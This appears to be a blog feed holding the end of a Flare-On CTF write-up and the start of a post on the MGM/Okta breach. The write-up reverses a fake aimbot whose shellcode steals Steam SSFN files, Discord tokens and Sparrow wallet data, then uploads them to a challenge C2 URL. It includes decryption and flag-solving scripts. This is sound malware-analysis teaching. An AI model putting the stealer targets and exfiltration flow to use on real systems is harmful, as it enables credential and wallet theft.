    ciphertext = f.read(<span class="hljs-number">16</span>)

print(<span class="hljs-string">"Bruteforcing last 4 chars"</span>)
<span class="hljs-keyword">for</span> key_suffix <span class="hljs-keyword">in</span> product(alphabet, repeat=<span class="hljs-number">4</span>):
    key = bytes(key_prefix + <span class="hljs-string">""</span>.join(key_suffix), <span class="hljs-string">"UTF-8"</span>)
    cipher = AES.new(key, AES.MODE_ECB)
    plaintext = cipher.decrypt(ciphertext)
    <span class="hljs-keyword">if</span> plaintext == known_plaintext[:<span class="hljs-number">16</span>]:
        print(<span class="hljs-string">f"Success, key = <span class="hljs-subst">{key}</span>"</span>)
        <span class="hljs-keyword">break</span>

print(<span class="hljs-string">"Decrypting payload"</span>)
<span class="hljs-keyword">with</span> open(<span class="hljs-string">"./program/aimbot_dll_payload_0xa6340_size_0x4470.bin"</span>, <span class="hljs-string">"rb"</span>) <span class="hljs-keyword">as</span> f:
    ciphertext = f.read()

cipher = AES.new(key, AES.MODE_ECB)
plaintext = cipher.decrypt(ciphertext)
h = SHA256.new()
h.update(plaintext)

print(<span class="hljs-string">f"SHA256 = <span class="hljs-subst">{h.hexdigest()}</span>"</span>)
<span class="hljs-keyword">with</span> open(<span class="hljs-string">"./program/aimbot_dll_payload_0xa6340_size_0x4470_decrypted.bin"</span>, <span class="hljs-string">"wb"</span>) <span class="hljs-keyword">as</span> f:
    f.write(plaintext)
</code></pre>
<p>With this, we can continue decrypting the shellcode, which is comprised of a series of chained blobs that execute in a sequence. The blobs execute in order from the first blob, extract information from a specific program and then forwards it to <code>C:\depot</code> and uses an RC4 key generated from a specific program's config files to decrypt the next blob of the malware.</p>
<h2 id="heading-steamguard-infostealer">SteamGuard Infostealer</h2>
<p>The first stage seems to be targeting Steam's <code>config.vdf</code> which contains Steam's <code>SentryFile</code> SSFN ID which stores your SteamGuard authentication.</p>
<pre><code class="lang-python">seg000:<span class="hljs-number">00000000000008</span>AE <span class="hljs-number">22</span> <span class="hljs-number">53</span> <span class="hljs-number">65</span> <span class="hljs-number">6</span>E <span class="hljs-number">74</span> <span class="hljs-number">72</span> <span class="hljs-number">79</span> <span class="hljs-number">46</span>…aSentryfile     db <span class="hljs-string">'"SentryFile"'</span>,<span class="hljs-number">0</span>     ; DATA XREF: sub_5FC:loc_693↑o
seg000:<span class="hljs-number">00000000000008</span>BB <span class="hljs-number">43</span> <span class="hljs-number">3</span>A <span class="hljs-number">5</span>C <span class="hljs-number">50</span> <span class="hljs-number">72</span> <span class="hljs-number">6</span>F <span class="hljs-number">67</span> <span class="hljs-number">72</span> aCProgramFilesX db <span class="hljs-string">'C:\Program Files (x86)\Steam\config\config.vdf'</span>,<span class="hljs-number">0</span>
seg000:<span class="hljs-number">00000000000008</span>BB <span class="hljs-number">61</span> <span class="hljs-number">6</span>D <span class="hljs-number">20</span> <span class="hljs-number">46</span> <span class="hljs-number">69</span> <span class="hljs-number">6</span>C <span class="hljs-number">65</span> <span class="hljs-number">73</span>…                                        ; DATA XREF: sub_5FC+<span class="hljs-number">11</span>↑o
seg000:<span class="hljs-number">00000000000008</span>EA <span class="hljs-number">43</span> <span class="hljs-number">3</span>A <span class="hljs-number">5</span>C <span class="hljs-number">64</span> <span class="hljs-number">65</span> <span class="hljs-number">70</span> <span class="hljs-number">6</span>F <span class="hljs-number">74</span> aCDepotSteamSsf db <span class="hljs-string">'C:\depot\steam_ssfn'</span>,<span class="hljs-number">0</span>
seg000:<span class="hljs-number">00000000000008</span>EA <span class="hljs-number">5</span>C <span class="hljs-number">73</span> <span class="hljs-number">74</span> <span class="hljs-number">65</span> <span class="hljs-number">61</span> <span class="hljs-number">6</span>D <span class="hljs-number">5</span>F <span class="hljs-number">73</span>…                                        ; DATA XREF: sub_5FC+<span class="hljs-number">12</span>D↑o
seg000:<span class="hljs-number">00000000000008</span>FE <span class="hljs-number">74</span> <span class="hljs-number">68</span> <span class="hljs-number">65</span> <span class="hljs-number">20</span> <span class="hljs-number">64</span> <span class="hljs-number">65</span> <span class="hljs-number">63</span> <span class="hljs-number">72</span> aTheDecryptionO db <span class="hljs-string">'the decryption of this blob was successful'</span>,<span class="hljs-number">0</span>
</code></pre>
<p>Within this file you can find :</p>
<pre><code class="lang-c"><span class="hljs-string">"InstallConfigStore"</span>
{
    <span class="hljs-string">"Software"</span>
    {
        <span class="hljs-string">"Valve"</span>
        {
            <span class="hljs-string">"Steam"</span>
            {
                <span class="hljs-string">"AutoUpdateWindowEnabled"</span>        <span class="hljs-string">"0"</span>
                <span class="hljs-string">"ShaderCacheManager"</span>
                {
                    <span class="hljs-string">"HasCurrentBucket"</span>        <span class="hljs-string">"1"</span>
                    <span class="hljs-string">"CurrentBucketGPU"</span>        <span class="hljs-string">""</span>
                    <span class="hljs-string">"CurrentBucketDriver"</span>        <span class="hljs-string">""</span>
                }
                <span class="hljs-string">"SentryFile"</span>        <span class="hljs-string">"C:\\Program Files (x86)\\steam\\ssfnXXXXXXXXXXXXXXXXXXX"</span>
                <span class="hljs-string">"Accounts"</span>
                {
                    <span class="hljs-string">"xxxxxxx"</span>
                    {
                        <span class="hljs-string">"SteamID"</span>        <span class="hljs-string">"xxxxxxxxxxxxx"</span>
                    }
                }
</code></pre>
<p>As the key length is 16 bytes the KSA calling the first 42 bytes of the encrypted next stage of the malware is again "the decryption of this blob was successful". The RC4 key should be the first 16 characters of the <code>config.vdf</code> file which is <code>"InstallConfigSt</code>.</p>
<h2 id="heading-discord-stealer">Discord Stealer</h2>
<p>The next stage of the malware looks a bit less straightforward at first sight. But is simpler (and funnier) than the one before.</p>
<pre><code class="lang-c">- <span class="hljs-number">0000000000000E71</span> FB <span class="hljs-number">97</span> FD <span class="hljs-number">0F</span>                                    dd <span class="hljs-number">0F</span>FD97FBh            ; kernel32.dll!CloseHandle
- seg000:<span class="hljs-number">0000000000000E75</span> A5 <span class="hljs-number">17</span> <span class="hljs-number">00</span> <span class="hljs-number">7</span>C                             dd <span class="hljs-number">7</span>C0017A5h            ; kernel32.dll!CreateFileA
- seg000:<span class="hljs-number">0000000000000E79</span> <span class="hljs-number">7</span>E D8 E2 <span class="hljs-number">73</span>                             dd <span class="hljs-number">73E2</span>D87Eh            ; kernel32.dll!ExitProcess
- seg000:<span class="hljs-number">0000000000000E7</span>D <span class="hljs-number">78</span> <span class="hljs-number">59</span> <span class="hljs-number">54</span> <span class="hljs-number">23</span>                             dd <span class="hljs-number">23545978</span>h            ; kernel32.dll!FindClose
- seg000:<span class="hljs-number">0000000000000E81</span> <span class="hljs-number">65</span> C0 D6 <span class="hljs-number">63</span>                             dd <span class="hljs-number">63</span>D6C065h            ; kernel32.dll!FindFirstFileA
- seg000:<span class="hljs-number">0000000000000E85</span> <span class="hljs-number">97</span> AC E1 A5                             dd <span class="hljs-number">0</span>A5E1AC97h           ; kernel32.dll!FindNextFileA
- seg000:<span class="hljs-number">0000000000000E89</span> AD <span class="hljs-number">9B</span> <span class="hljs-number">7</span>D DF                             dd <span class="hljs-number">0</span>DF7D9BADh           ; kernel32.dll!GetFileSize
- seg000:<span class="hljs-number">0000000000000E8</span>D AE EC <span class="hljs-number">0</span>E A8                             dd <span class="hljs-number">0</span>A80EECAEh           ; kernel32.dll!GetProcessHeap
- seg000:<span class="hljs-number">0000000000000E91</span> <span class="hljs-number">16</span> <span class="hljs-number">65</span> FA <span class="hljs-number">10</span>                             dd <span class="hljs-number">10F</span>A6516h            ; kernel32.dll!ReadFile
- seg000:<span class="hljs-number">0000000000000E95</span> <span class="hljs-number">5</span>E <span class="hljs-number">89</span> EC <span class="hljs-number">99</span>                             dd <span class="hljs-number">99</span>EC895Eh            ; kernel32.dll!CopyFileA
- seg000:<span class="hljs-number">0000000000000E99</span> D8 <span class="hljs-number">85</span> B5 EE                             dd <span class="hljs-number">0</span>EEB585D8h           ; kernel32.dll!ExpandEnvironmentStringsA
- seg000:<span class="hljs-number">0000000000000E9</span>D F2 DB <span class="hljs-number">74</span> AD                             dd <span class="hljs-number">0</span>AD74DBF2h
- seg000:<span class="hljs-number">0000000000000</span>EA1 <span class="hljs-number">26</span> <span class="hljs-number">25</span> <span class="hljs-number">19</span> <span class="hljs-number">3</span>E                             dd <span class="hljs-number">3E192526</span>h            ; ntoskrnl.exe!RtlAllocateHeap
- seg000:<span class="hljs-number">0000000000000</span>EA5 B8 <span class="hljs-number">12</span> DA <span class="hljs-number">00</span>                             dd <span class="hljs-number">0</span>DA12B8h             ; ntoskrnl.exe!RtlFreeHeap
</code></pre>
<p>The malware searches for <code>.ldb</code> files (Microsoft Access Lock Information Files) in <code>C:\Users\three\AppData\Roaming\Discord\Local Storage\leveldb</code> and searches for <code>dQw4w9WgXcQ</code> (the URL for Rick Astley - Never Gonna Give You Up music video) in the contents of the each <code>.ldb</code> file. It then reads the first 16 bytes of file <code>C:\Users\three\AppData\Roaming\Discord\Network\Origin Bound Certs</code> to get the RC4 key to decrypt the next blob, which the key is <code>SQLite format 3\0</code>.</p>
<h2 id="heading-sparrow-wallet-stealer">Sparrow Wallet Stealer</h2>
<p>The third stage is related to the Cryptowallet Sparrow, which I'm honestly less familiar with.</p>
<pre><code class="lang-c">eg000:<span class="hljs-number">0000000000000</span>EF4 FB <span class="hljs-number">97</span> FD <span class="hljs-number">0F</span>                             dd <span class="hljs-number">0F</span>FD97FBh            ; kernel32.dll!CloseHandle
seg000:<span class="hljs-number">0000000000000</span>EF8 A5 <span class="hljs-number">17</span> <span class="hljs-number">00</span> <span class="hljs-number">7</span>C                             dd <span class="hljs-number">7</span>C0017A5h            ; kernel32.dll!CreateFileA
seg000:<span class="hljs-number">0000000000000</span>EFC <span class="hljs-number">7</span>E D8 E2 <span class="hljs-number">73</span>                             dd <span class="hljs-number">73E2</span>D87Eh            ; kernel32.dll!ExitProcess
seg000:<span class="hljs-number">0000000000000F</span>00 <span class="hljs-number">78</span> <span class="hljs-number">59</span> <span class="hljs-number">54</span> <span class="hljs-number">23</span>                             dd <span class="hljs-number">23545978</span>h            ; kernel32.dll!FindClose
seg000:<span class="hljs-number">0000000000000F</span>04 <span class="hljs-number">65</span> C0 D6 <span class="hljs-number">63</span>                             dd <span class="hljs-number">63</span>D6C065h            ; kernel32.dll!FindFirstFileA
seg000:<span class="hljs-number">0000000000000F</span>08 <span class="hljs-number">97</span> AC E1 A5                             dd <span class="hljs-number">0</span>A5E1AC97h           ; kernel32.dll!FindNextFileA
seg000:<span class="hljs-number">0000000000000F</span>0C AD <span class="hljs-number">9B</span> <span class="hljs-number">7</span>D DF                             dd <span class="hljs-number">0</span>DF7D9BADh           ; kernel32.dll!GetFileSize
seg000:<span class="hljs-number">0000000000000F</span>10 AE EC <span class="hljs-number">0</span>E A8                             dd <span class="hljs-number">0</span>A80EECAEh           ; kernel32.dll!GetProcessHeap
seg000:<span class="hljs-number">0000000000000F</span>14 <span class="hljs-number">16</span> <span class="hljs-number">65</span> FA <span class="hljs-number">10</span>                             dd <span class="hljs-number">10F</span>A6516h            ; kernel32.dll!ReadFile
seg000:<span class="hljs-number">0000000000000F</span>18 <span class="hljs-number">5</span>E <span class="hljs-number">89</span> EC <span class="hljs-number">99</span>                             dd <span class="hljs-number">99</span>EC895Eh            ; kernel32.dll!CopyFileA
seg000:<span class="hljs-number">0000000000000F</span>1C D8 <span class="hljs-number">85</span> B5 EE                             dd <span class="hljs-number">0</span>EEB585D8h           ; kernel32.dll!ExpandEnvironmentStringsA
seg000:<span class="hljs-number">0000000000000F</span>20 F2 DB <span class="hljs-number">74</span> AD                             dd <span class="hljs-number">0</span>AD74DBF2h
seg000:<span class="hljs-number">0000000000000F</span>24 <span class="hljs-number">26</span> <span class="hljs-number">25</span> <span class="hljs-number">19</span> <span class="hljs-number">3</span>E                             dd <span class="hljs-number">3E192526</span>h            ; ntoskrnl.exe!RtlAllocateHeap
seg000:<span class="hljs-number">0000000000000F</span>28 B8 <span class="hljs-number">12</span> DA <span class="hljs-number">00</span>                             dd <span class="hljs-number">0</span>DA12B8h             ; ntoskrnl.exe!RtlFreeHeap
</code></pre>
<p>The shellcode searches for database files and their contents (some using a specific pattern) in <code>C:\Users\three\AppData\Roaming\Sparrow\wallets</code> and <code>C:\Users\three\AppData\Roaming\Sparrow\config</code> copies them to the depot folder. The <code>config</code> folder contains JSON files and recent used wallets in <code>recentWalletFiles</code>, which is the 17 char RC4 key for the next blob.</p>
<h2 id="heading-c2-forwarder">C2 Forwarder</h2>
<p>After all of the files are collected to <code>C:\depot</code>, the malware moves it to <code>C:\depot\output</code> and forwards it to <a target="_blank" href="https://bighackies.flare-on.com/stolen"><code>https://bighackies.flare-on.com/stolen</code></a>.</p>
<pre><code class="lang-c">seg000:<span class="hljs-number">0000000000000</span>CEF <span class="hljs-number">17</span> CA <span class="hljs-number">2B</span> <span class="hljs-number">6</span>E             dword_CEF       dd <span class="hljs-number">6E2</span>BCA17h            ; DATA XREF: sub_0+<span class="hljs-number">3</span>A↑o
seg000:<span class="hljs-number">0000000000000</span>CF3 FB <span class="hljs-number">97</span> FD <span class="hljs-number">0F</span>                             dd <span class="hljs-number">0F</span>FD97FBh            ; kernel32.dll!CloseHandle
seg000:<span class="hljs-number">0000000000000</span>CF7 A5 <span class="hljs-number">17</span> <span class="hljs-number">00</span> <span class="hljs-number">7</span>C                             dd <span class="hljs-number">7</span>C0017A5h            ; kernel32.dll!CreateFileA
seg000:<span class="hljs-number">0000000000000</span>CFB <span class="hljs-number">7</span>E D8 E2 <span class="hljs-number">73</span>                             dd <span class="hljs-number">73E2</span>D87Eh            ; kernel32.dll!ExitProcess
seg000:<span class="hljs-number">0000000000000</span>CFF <span class="hljs-number">78</span> <span class="hljs-number">59</span> <span class="hljs-number">54</span> <span class="hljs-number">23</span>                             dd <span class="hljs-number">23545978</span>h            ; kernel32.dll!FindClose
seg000:<span class="hljs-number">0000000000000</span>D03 <span class="hljs-number">65</span> C0 D6 <span class="hljs-number">63</span>                             dd <span class="hljs-number">63</span>D6C065h            ; kernel32.dll!FindFirstFileA
seg000:<span class="hljs-number">0000000000000</span>D07 <span class="hljs-number">97</span> AC E1 A5                             dd <span class="hljs-number">0</span>A5E1AC97h           ; kernel32.dll!FindNextFileA
seg000:<span class="hljs-number">0000000000000</span>D0B AD <span class="hljs-number">9B</span> <span class="hljs-number">7</span>D DF                             dd <span class="hljs-number">0</span>DF7D9BADh           ; kernel32.dll!GetFileSize
seg000:<span class="hljs-number">0000000000000</span>D0F AE EC <span class="hljs-number">0</span>E A8                             dd <span class="hljs-number">0</span>A80EECAEh           ; kernel32.dll!GetProcessHeap
seg000:<span class="hljs-number">0000000000000</span>D13 <span class="hljs-number">16</span> <span class="hljs-number">65</span> FA <span class="hljs-number">10</span>                             dd <span class="hljs-number">10F</span>A6516h            ; kernel32.dll!ReadFile
seg000:<span class="hljs-number">0000000000000</span>D17 <span class="hljs-number">1F</span> <span class="hljs-number">79</span> <span class="hljs-number">0</span>A E8                             dd <span class="hljs-number">0E80</span>A791Fh           ; kernel32.dll!WriteFile
seg000:<span class="hljs-number">0000000000000</span>D1B F2 DB <span class="hljs-number">74</span> AD                             dd <span class="hljs-number">0</span>AD74DBF2h
seg000:<span class="hljs-number">0000000000000</span>D1F <span class="hljs-number">26</span> <span class="hljs-number">25</span> <span class="hljs-number">19</span> <span class="hljs-number">3</span>E                             dd <span class="hljs-number">3E192526</span>h            ; ntoskrnl.exe!RtlAllocateHeap
seg000:<span class="hljs-number">0000000000000</span>D23 B8 <span class="hljs-number">12</span> DA <span class="hljs-number">00</span>                             dd <span class="hljs-number">0</span>DA12B8h             ; ntoskrnl.exe!RtlFreeHeap
seg000:<span class="hljs-number">0000000000000</span>D27 A4 A2 <span class="hljs-number">9F</span> ED                             dd <span class="hljs-number">0</span>ED9FA2A4h
seg000:<span class="hljs-number">0000000000000</span>D2B <span class="hljs-number">9F</span> <span class="hljs-number">76</span> DE F7                             dd <span class="hljs-number">0F</span>7DE769Fh           ; wininet.dll!HttpOpenRequestA
seg000:<span class="hljs-number">0000000000000</span>D2F FA <span class="hljs-number">45</span> <span class="hljs-number">2F</span> FB                             dd <span class="hljs-number">0F</span>B2F45FAh           ; wininet.dll!HttpQueryInfoA
seg000:<span class="hljs-number">0000000000000</span>D33 <span class="hljs-number">9</span>D BE E6 <span class="hljs-number">2</span>D                             dd <span class="hljs-number">2</span>DE6BE9Dh            ; wininet.dll!HttpSendRequestA
seg000:<span class="hljs-number">0000000000000</span>D37 C7 <span class="hljs-number">69</span> <span class="hljs-number">9B</span> FA                             dd <span class="hljs-number">0F</span>A9B69C7h           ; wininet.dll!InternetCloseHandle
seg000:<span class="hljs-number">0000000000000</span>D3B <span class="hljs-number">0</span>E E8 <span class="hljs-number">4B</span> <span class="hljs-number">1</span>E                             dd <span class="hljs-number">1E4</span>BE80Eh            ; wininet.dll!InternetConnectA
seg000:<span class="hljs-number">0000000000000</span>D3F <span class="hljs-number">29</span> <span class="hljs-number">44</span> E8 <span class="hljs-number">57</span>                             dd <span class="hljs-number">57E84429</span>h            ; wininet.dll!InternetOpenA
seg000:<span class="hljs-number">0000000000000</span>D43 <span class="hljs-number">8B</span> <span class="hljs-number">4B</span> E3 <span class="hljs-number">5F</span>                             dd <span class="hljs-number">5F</span>E34B8Bh            ; wininet.dll!InternetReadFile
</code></pre>
<p>The payload initiates contact with its C2 server, with the response from the C2 server containing CRC32 checksums for different segments of the exfiltrated data. The first four bytes of the C2 response are expected to be the CRC32 checksum of the entire exfiltrated data (<code>0...n</code>). Subsequent bytes follow a similar pattern, with each set representing the CRC32 checksum of a progressively smaller data segment.</p>
<p><code>InternetReadFile</code> is called with <code>dwNumberOfBytesToRead</code> set to 7. However, the buffer (<code>lpBuffer</code>) is expected to contain 16 bytes of data. This discrepancy suggests that the server's response likely includes four CRC32 values, corresponding to different segments of the exfiltrated data.</p>
<p>The next blob is XOR encrypted with a 4 byte key, where the key is calculated by multiplying <code>0x1234567</code> with the integer value in <code>lpBuffer</code>. <code>lpBuffer</code> obtains its value from the <code>HttpQueryInfoA</code> function, specifically from the <code>HTTP_QUERY_CONTENT_LENGTH</code> flag, which returns the size of the resource as a 32-bit number. The XOR key is then used to decrypt the next stage of the payload blob.</p>
<h2 id="heading-game-check">Game Check</h2>
<p>The final blob is related to the game, which yes, requires you to play the game.</p>
<pre><code class="lang-c">seg000:<span class="hljs-number">0000000000000</span>CF8 FB <span class="hljs-number">97</span> FD <span class="hljs-number">0F</span>                             dd <span class="hljs-number">0F</span>FD97FBh            ; kernel32.dll!CloseHandle
seg000:<span class="hljs-number">0000000000000</span>CFC A5 <span class="hljs-number">17</span> <span class="hljs-number">00</span> <span class="hljs-number">7</span>C                             dd <span class="hljs-number">7</span>C0017A5h            ; kernel32.dll!CreateFileA
seg000:<span class="hljs-number">0000000000000</span>D00 <span class="hljs-number">7</span>E D8 E2 <span class="hljs-number">73</span>                             dd <span class="hljs-number">73E2</span>D87Eh            ; kernel32.dll!ExitProcess
seg000:<span class="hljs-number">0000000000000</span>D04 <span class="hljs-number">04</span> <span class="hljs-number">49</span> <span class="hljs-number">32</span> D3                             dd <span class="hljs-number">0</span>D3324904h           ; kernel32.dll!GetModuleHandleA
seg000:<span class="hljs-number">0000000000000</span>D08 AE EC <span class="hljs-number">0</span>E A8                             dd <span class="hljs-number">0</span>A80EECAEh           ; kernel32.dll!GetProcessHeap
seg000:<span class="hljs-number">0000000000000</span>D0C <span class="hljs-number">16</span> <span class="hljs-number">65</span> FA <span class="hljs-number">10</span>                             dd <span class="hljs-number">10F</span>A6516h            ; kernel32.dll!ReadFile
seg000:<span class="hljs-number">0000000000000</span>D10 AC <span class="hljs-number">08</span> DA <span class="hljs-number">76</span>                             dd <span class="hljs-number">76</span>DA08ACh            ; kernel32.dll!SetFilePointer
seg000:<span class="hljs-number">0000000000000</span>D14 D8 <span class="hljs-number">85</span> B5 EE                             dd <span class="hljs-number">0</span>EEB585D8h           ; kernel32.dll!ExpandEnvironmentStringsA
seg000:<span class="hljs-number">0000000000000</span>D18 F2 DB <span class="hljs-number">74</span> AD                             dd <span class="hljs-number">0</span>AD74DBF2h
seg000:<span class="hljs-number">0000000000000</span>D1C <span class="hljs-number">26</span> <span class="hljs-number">25</span> <span class="hljs-number">19</span> <span class="hljs-number">3</span>E                             dd <span class="hljs-number">3E192526</span>h            ; ntoskrnl.exe!RtlAllocateHeap
</code></pre>
<p>The final shellcode reads data from <code>C:\Program Files(x86)\Sauerbraten\packages\base\spcr2.cfg</code> which is the map spcr2. The shellcode reads 4 bytes from offset 0 <code>0xa45</code>, which is <code>maps</code> and 8 bytes from offset 81 <code>0xa73</code>.</p>
<pre><code class="lang-c">v0 = (*((__int64 (__fastcall **)(_QWORD))&amp;dword_CAC + <span class="hljs-number">3</span>))(<span class="hljs-number">0164</span>);
<span class="hljs-keyword">if</span> ( (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)mem_cmp(v0 + <span class="hljs-number">0x2458C0</span> (__int64)<span class="hljs-string">"spcr"</span>, <span class="hljs-number">4u</span>i64) )
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>i64;
<span class="hljs-keyword">if</span> ( !*(_BYTE *)(v0 + <span class="hljs-number">0x2458C4</span>) )
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>i64;
sub_58A((__int64)v14, <span class="hljs-string">"%%PROGRAMFILES(X86)\\Sauerbraten\\packages\\base\\%s.cfg"</span>);
(*((<span class="hljs-keyword">void</span> (__fastcall **)(<span class="hljs-keyword">char</span> *, <span class="hljs-keyword">char</span> *, __int64 &amp;dword_CAC + <span class="hljs-number">7</span>))(v14, v15, <span class="hljs-number">1024</span>i64);
v2 = sub_6C6((__int64)v15, Ox80000000);
v3 = v2;
</code></pre>
<p>The function extracts the map data and sees if the player has achieved 1337 kills with exactly 1337 bullets in less than 5 minutes, which is very complicated to do in-game (even with an aimbot). A solution is to pull the key bytes statically and calculate the remaining key bytes with the CRC32 check to verify the correct flag value.</p>
<pre><code class="lang-c">from binascii <span class="hljs-keyword">import</span> crc32
from <span class="hljs-built_in">string</span> <span class="hljs-keyword">import</span> printable
from itertools <span class="hljs-keyword">import</span> product

# <span class="hljs-function">Read the initial part of the flag from the file
with <span class="hljs-title">open</span><span class="hljs-params">(<span class="hljs-string">"../files/spcr2.cfg"</span>, <span class="hljs-string">"rb"</span>)</span> as f:
    dd_file_offset_4 </span>= <span class="hljs-keyword">int</span>.from_bytes(f.read(<span class="hljs-number">4</span>), <span class="hljs-string">"little"</span>)
    f.seek(<span class="hljs-number">81</span>)
    initial_flag_part = f.read(<span class="hljs-number">8</span>)

# Set up the base flag
flag_base = <span class="hljs-number">25</span> * b<span class="hljs-string">"\x20"</span> + b<span class="hljs-string">"flare-on.com"</span>
flag = bytearray(flag_base)
flag[<span class="hljs-number">0</span>:<span class="hljs-number">8</span>] = initial_flag_part
flag[<span class="hljs-number">8</span>] = ord(<span class="hljs-string">"_"</span>)

# Apply XOR operations to calculate parts of the flag
def <span class="hljs-keyword">xor</span>(value, mask):
    <span class="hljs-keyword">return</span> value ^ mask

flag[<span class="hljs-number">9</span>:<span class="hljs-number">13</span>] = [(dd_file_offset_4 ^ mask) &amp; <span class="hljs-number">0xFF</span> <span class="hljs-keyword">for</span> mask in [<span class="hljs-number">0xC</span>, <span class="hljs-number">0x120C</span>, <span class="hljs-number">0x3120C</span>, <span class="hljs-number">0x4203120C</span>]]
flag[<span class="hljs-number">13</span>:<span class="hljs-number">17</span>] = <span class="hljs-keyword">xor</span>(dd_file_offset_4, <span class="hljs-number">0x1715151E</span>).to_bytes(<span class="hljs-number">4</span>, <span class="hljs-string">"little"</span>)
flag[<span class="hljs-number">17</span>:<span class="hljs-number">21</span>] = <span class="hljs-keyword">xor</span>(dd_file_offset_4, <span class="hljs-number">0x15040232</span>).to_bytes(<span class="hljs-number">4</span>, <span class="hljs-string">"little"</span>)
flag[<span class="hljs-number">24</span>] = ord(<span class="hljs-string">"@"</span>)

# Brute-force the remaining characters
<span class="hljs-keyword">for</span> i in product(printable, repeat=<span class="hljs-number">3</span>):
    flag[<span class="hljs-number">21</span>:<span class="hljs-number">24</span>] = [ord(c) <span class="hljs-keyword">for</span> c in i]
    <span class="hljs-keyword">if</span> crc32(flag[:<span class="hljs-number">25</span>]) == <span class="hljs-number">0xA5561586</span>:
        print(f<span class="hljs-string">"Flag: {flag.decode('UTF-8')}"</span>)
        <span class="hljs-keyword">break</span>
<span class="hljs-keyword">else</span>:
    print(<span class="hljs-string">"Failed bruting the CRC32 check!"</span>)
</code></pre>
<pre><code class="lang-c">&gt; python solve.py
Flag: computer_ass1sted_ctfing@flare-on.com
</code></pre>
<p>Why did I do this? I don't know. Will I do it again? Probably not. But alas, the reason why I don't usually do CTFs.</p>
]]></content:encoded></item><item><title><![CDATA[Second Guessing the MGM-Okta Hack]]></title><description><![CDATA[Cover Illustration by mocapoca_

A lot of fuzz has been made about the ALPHV/Blackcat hack against MGM Resorts, where they said that they exploited MGM's Okta Agent to sniff for passwords, gaining super administrator privileges to MGM's Okta account ...]]></description><link>https://research.meekolab.com/second-guessing-the-mgm-okta-hack</link><guid isPermaLink="true">https://research.meekolab.com/second-guessing-the-mgm-okta-hack</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Sun, 17 Sep 2023 17:03:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1694970281317/3170928c-f848-4792-967f-7d0af28c0067.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by mocapoca_</em></strong></p>
</blockquote>
<p>A lot of fuzz has been made about the ALPHV/Blackcat hack against MGM Resorts, where they said that they exploited MGM's <a target="_blank" href="https://www.darkreading.com/application-security/okta-flaw-involved-mgm-resorts-breach-attackers-claim">Okta Agent</a> to sniff for passwords, gaining super administrator privileges to MGM's Okta account and escalating their attack to Global Administrator privileges on their <a target="_blank" href="https://learn.microsoft.com/en-us/azure/active-directory/develop/quickstart-create-new-tenant">Azure Active Directory Tenant</a>.</p>
<p>Specifically, they outlined that :</p>
<blockquote>
<p>MGM made the hasty decision to shut down each and every one of their Okta Sync servers after learning we had been lurking on their Okta Agent servers sniffing passwords of people whose passwords couldn't be cracked from their domain controller hash dumps.</p>
</blockquote>
<p>This leads to very interesting questions :</p>
<ol>
<li><p>What did they mean by "sniffing passwords of people whose passwords couldn't be cracked"?</p>
</li>
<li><p>What role did Okta Sync servers play in breaching MGM's active directory?</p>
</li>
</ol>
<h2 id="heading-3rd-party-identity-providers-and-ad">3rd Party Identity Providers and AD</h2>
<p>We know that Okta, like other IdP vendors such as Jumpcloud, has integrations with Microsoft Active Directory for both <a target="_blank" href="https://www.okta.com/integrations/active-directory/">On-prem AD</a> and <a target="_blank" href="https://help.okta.com/en-us/content/topics/provisioning/azure/azure-integrate-main.htm">Azure-based Cloud AD</a>. While these companies usually tout that their solutions can replace <a target="_blank" href="https://www.okta.com/sites/default/files/2020-07/The%20Benefits%20of%20Migrating%20from%20ADFS%20to%20Okta%20White%20Paper_Updated_0.pdf">Active Directory</a>, sometimes migrating away from Active Directory as a <a target="_blank" href="https://www.okta.com/integrations/active-directory/">single source of truth</a> for user management can be a pain in the ass especially if you operate a large workforce.</p>
<p>Okta also syncs Application-level password synchronization, which allows it to sync an Okta password to certain third-party applications. This also works with Active Directory and LDAP as outlined in this [documentation](https://help.okta.com/en-us/content/topics/directory/password-sync-application.htm) :</p>
<blockquote>
<p>If you have configured Okta to use delegated authentication with Active Directory (AD) or LDAP, the password used to sign in to Okta is the Active Directory or LDAP password. Okta uses the application API to synchronize the Active Directory or LDAP password to the application. The password is stored as the application password.</p>
</blockquote>
<p>Okta Agent connections also use Port 443 for AD and 636 for LDAP, both of which are secured using SSL by validating the Okta server SSL and mutual authentication with the Domain Controller using a limited read-only integration account created at the DC during the agent install process according to this <a target="_blank" href="https://www.okta.com/sg/resources/whitepaper/ad-architecture/">document</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1694872354020/9ad065ab-f8ad-491c-9134-fdd734cc04bb.png" alt class="image--center mx-auto" /></p>
<p>Many were quick to assume that either Okta was storing the passwords in cleartext or that ALPHV had magically found a way to decipher TLS connections, which have massive implications. But I think the explanation is far more simple than this.</p>
<p>Okta is not a small company, but a massive IdP vendor. I think if they were transferring passwords from AD to Agent, someone would've sniffed the packets and reported it publically. And I'm pretty sure the ones behind ALPHV don't have access to Project <a target="_blank" href="https://archive.nytimes.com/www.nytimes.com/interactive/2013/09/05/us/documents-reveal-nsa-campaign-against-encryption.html?_r=0">BULLRUN</a>.</p>
<h2 id="heading-delegated-authentication">Delegated Authentication</h2>
<p>Okta's AD synchronization feature syncs users to Okta and enables <a target="_blank" href="https://help.okta.com/en-us/content/topics/security/security_authentication.htm">Delegated Authentication</a>. So basically, when you enter your password in Okta, it gets put in a queue and the agent grabs it and authenticates on your behalf to AD. The password gets encrypted when put in the queue and then the agent decrypts on-premises (or they can just purely rely on TLS), but it will use the clear text to authenticate to AD as the Microsoft API works that way. You can replicate this via powershell easily :</p>
<pre><code class="lang-powershell"><span class="hljs-keyword">param</span>(
    [<span class="hljs-built_in">string</span>]<span class="hljs-variable">$Username</span>,
    [<span class="hljs-built_in">string</span>]<span class="hljs-variable">$Password</span>,
    [<span class="hljs-built_in">string</span>]<span class="hljs-variable">$domain</span>.domain
)

<span class="hljs-built_in">Add-Type</span> <span class="hljs-literal">-AssemblyName</span> <span class="hljs-string">"System.DirectoryServices.AccountManagement"</span>

<span class="hljs-comment"># Create a context to the Active Directory</span>
